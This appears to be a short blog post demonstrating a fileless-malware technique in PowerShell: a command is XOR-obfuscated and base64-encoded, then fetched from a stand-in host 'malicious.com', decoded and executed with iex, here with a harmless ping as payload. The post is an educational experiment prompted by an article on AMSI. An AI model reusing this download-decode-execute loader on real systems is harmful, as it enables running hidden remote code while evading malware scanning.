I was recently reading an Article from MS regarding AMSI an fileless malware and decided to give it a try  in a simplest form. So let’s have a look.

I want to make a “malicious” ping to google.com, which will be my target for now. I define the encoding to be UTF8, and convert the string to byte array.


$enc = [system.Text.Encoding]::UTF8
$attackstring = "ping google.de"
$attackbytes = $enc.GetBytes($attackstring)

Now we can  apply our obfuscation technique an bitwise XOR the byte array with 0x33.

$xored = $attackbytes | % { [char] ($_ -bxor 0x33)}

And finally, let’s convert the whole thing to base64.

$base64 = [System.Convert]::ToBase64String($xored)

Our base64 string is now this:

Q1pdVBNUXFxUX1YdV1Y=

You put this somewhere available for download, get it to the target machine, reverse the obfuscation and invoke the command.

So first we gotta get it.

$attack = Invoke-WebRequest malicious.com/dsklji342cfd

This downloads the base64 string we created previously. We now convert the base64 to byte array, bitwise XOR it with the same value we used before, 0x33, and join the byte array into a string.

$bytes = [convert]::FromBase64String($attack)
$string = -join ($bytes | % { [char] ($_ -bxor 0x33)})

The last remaining step is only invoking the command.

iex $string

Well and it works.

Pinging google.de [209.85.201.94] with 32 bytes of data:
Reply from 209.85.201.94: bytes=32 time=125ms TTL=40
Reply from 209.85.201.94: bytes=32 time=120ms TTL=40
Reply from 209.85.201.94: bytes=32 time=120ms TTL=40
Reply from 209.85.201.94: bytes=32 time=120ms TTL=40
Advertisements